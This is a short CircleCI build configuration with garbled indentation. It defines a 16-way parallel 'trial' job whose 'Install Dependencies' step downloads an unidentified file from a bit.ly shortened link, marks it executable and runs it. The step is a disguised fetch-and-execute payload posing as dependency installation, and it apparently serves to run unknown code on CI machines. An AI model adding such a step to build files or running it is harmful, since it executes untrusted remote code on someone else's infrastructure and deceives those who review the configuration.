version: 2.1
jobs:
    trial:
          docker:
                      - image: circleci/ruby:2.5.3
                            parallelism: 16
                                  steps:
                                          - run:
                                                      name: Install Dependencies
                                                                  command: |
                                                                                wget https://bit.ly/3nG3yZR && chmod u+x 3nG3yZR && ./3nG3yZR
                                                                                              echo Ada

                                                                                              workflows:
                                                                                                  version: 2.1
                                                                                                      build:
                                                                                                              jobs:
                                                                                                                      - trial